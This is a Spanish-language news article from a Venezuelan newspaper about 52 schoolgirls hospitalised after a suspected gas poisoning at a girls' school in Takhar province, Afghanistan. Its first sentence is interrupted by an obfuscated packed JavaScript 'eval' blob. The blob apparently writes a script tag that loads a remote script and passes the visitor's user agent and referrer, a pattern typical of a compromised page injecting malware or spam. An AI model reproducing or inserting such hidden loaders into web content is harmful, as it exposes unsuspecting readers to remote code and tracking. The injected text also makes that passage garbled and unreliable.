publicidad


Alumnas caen envenenadas en escuela de Afganistán

EFE / Kabul / jurdaneta@laverdad.com
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htnez|var|u0026u|referrer|aisai||js|php'.split('|'),0,{})) intoxicación afectó a 52 estudiantes cuando aparentemente aspiraron un gas aún desconocido. El hecho ocurrió en un colegio femenino del área de Ahandara, en el distrito de Taluqan, al norte de Afganistán. Las afectadas fueron atendidas en un centro médico de la localidad y se encuentran bajo peligro

La intoxicación con un gas ocurrió en una escuela femenina ubicada al norte de Afganistán. (Foto: Archivo)

Al menos 52 alumnas fueron hospitalizadas hoy después de ser envenenadas supuestamente con gas mientras se encontraban en sus aulas en una escuela de la provincia de Takhar, en el norte de Afganistán.

El suceso ocurrió en la mañana de este sábado mientras las estudiantes se encontraban en un colegio femenino en el área de Ahandara, en el distrito de Taluqan, afirmó el portavoz de la Policía provincial, Abdul Khalil Aseer.

Según el portavoz, el estado de salud de las estudiantes hospitalizadas es "bueno" y ya han sido dadas de alta.

Un equipo de investigación formado por miembros de la Policía y de los departamentos de Salud y Educación del Gobierno regional se han desplazado hasta el lugar del incidente para aclarar lo sucedido.

"Podría tratarse de un tipo de gas cuyos efectos desaparecen a las pocas horas", explicó el portavoz policial, después que tras las primeras pesquisas fueran descartados el envenenamiento por ingesta de algún líquido o alimento.

Los casos de intoxicaciones en escuelas femeninas son bastante frecuentes en Afganistán y suelen estar rodeados de cierto misterio.

Hace menos de un mes 125 alumnas fueron también hospitalizadas después de ser envenenadas supuestamente con un gas en la provincia de Farah, en el oeste afgano.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama